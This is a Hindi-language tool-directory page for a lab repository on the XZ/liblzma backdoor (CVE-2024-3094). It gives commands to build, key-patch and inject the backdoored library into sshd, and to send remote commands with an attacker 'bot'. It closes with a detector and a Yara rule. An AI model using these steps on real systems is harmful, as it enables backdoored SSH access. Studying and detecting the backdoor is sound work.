Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2024-3094 — एक XZ बैकडोर कमजोरी को विस्तार से समझाया गया | Kitploit
उपकरण/GitHubGitHub/valeriot30/cve-2024-3094
भेद्यता विश्लेषणशोषणमालवेयर विश्लेषणबाइनरी विश्लेषणलर्निंग और शिक्षालैब और अभ्यास
GitHubvaleriot30/cve-2024-3094

cve-2024-3094

एक XZ बैकडोर कमजोरी को विस्तार से समझाया गया

रिपॉजिटरी देखें
1131 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛡️ साइबर सुरक्षा परियोजना: liblzma में XZ बैकडोर का विश्लेषण

📄 अवलोकन

यह परियोजना xz-utils (liblzma) में खोजे गए उच्च-प्रोफ़ाइल बैकडोर का विश्लेषण करती है, जो संस्करण 5.6.0 और 5.6.1 को प्रभावित करता है। अपस्ट्रीम बिल्ड सिस्टम में शामिल किए गए दुर्भावनापूर्ण कोड ने रनटाइम पर sshd के LZMA संपीड़न लाइब्रेरी के साथ इंटरैक्ट करने के तरीके को संशोधित करके SSH प्रमाणीकरण को लक्षित किया।

⚠️ यह परियोजना केवल शैक्षिक और रक्षात्मक अनुसंधान उद्देश्यों के लिए है।

कमजोर मशीन

इस रिपॉजिटरी को क्लोन करें

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

निर्देशिका में जाएं

root@kitploit:~
cd cve-2024-3094

डॉकर कंटेनर चलाएं

root@kitploit:~
docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev

लाइब्रेरी का दुर्भावनापूर्ण संस्करण प्राप्त करें

root@kitploit:~
cd ~  
git clone https://github.com/thesamesam/xz-archive.git  
cd xz-archive/5.6/ # The vulnerable version ( it works as well with 5.6.1 )  
tar xzf xz-5.6.0.tar.gz  
mv xz-5.6.0 ~

बिल्ड लक्ष्य निर्यात करें

root@kitploit:~
export RPM_ARCH=$(uname -m)

दुर्भावनापूर्ण लाइब्रेरी संकलित करें

root@kitploit:~
cd ~
 cd ./xz-5.6.0/  
./configure
make -j 8

दुर्भावनापूर्ण SO को बाहर कॉपी करें:

root@kitploit:~
cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~

कंटेनर के अंदर रिपॉजिटरी को फिर से क्लोन करें

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

लिबलज़मा लाइब्रेरी को कस्टम कुंजी से पैच करें

root@kitploit:~
 python3 cve-2024-3094/patch.py liblzma.so.5.6.0

सिस्टम में दुर्भावनापूर्ण लाइब्रेरी को लिंक करें

root@kitploit:~
 sh cve-2024-3094/inject.sh

दुर्भावनापूर्ण लाइब्रेरी से जुड़े sshd को चलाएँ

root@kitploit:~
 env -i LANG=C /usr/sbin/sshd -D &

हमलावर मशीन

इस रिपॉजिटरी को क्लोन करें

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

निर्देशिका में जाएं

root@kitploit:~
cd cve-2024-3094

GO टूल संकलित करें

root@kitploit:~
go build

कमजोर मशीन का IP पता और निष्पादित करने के लिए कमांड डालकर टूल का उपयोग करें

root@kitploit:~
./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'

प्रतिउपाय

डिटेक्टर का उपयोग करना

डिटेक्टर चलाएं

root@kitploit:~
sh detector.sh

Yara का उपयोग करना

Yara मिलान नियमों का उपयोग करें

root@kitploit:~
yara rule.yar ../liblzma.so.5.6.0 -s
टूल डाउनलोड करें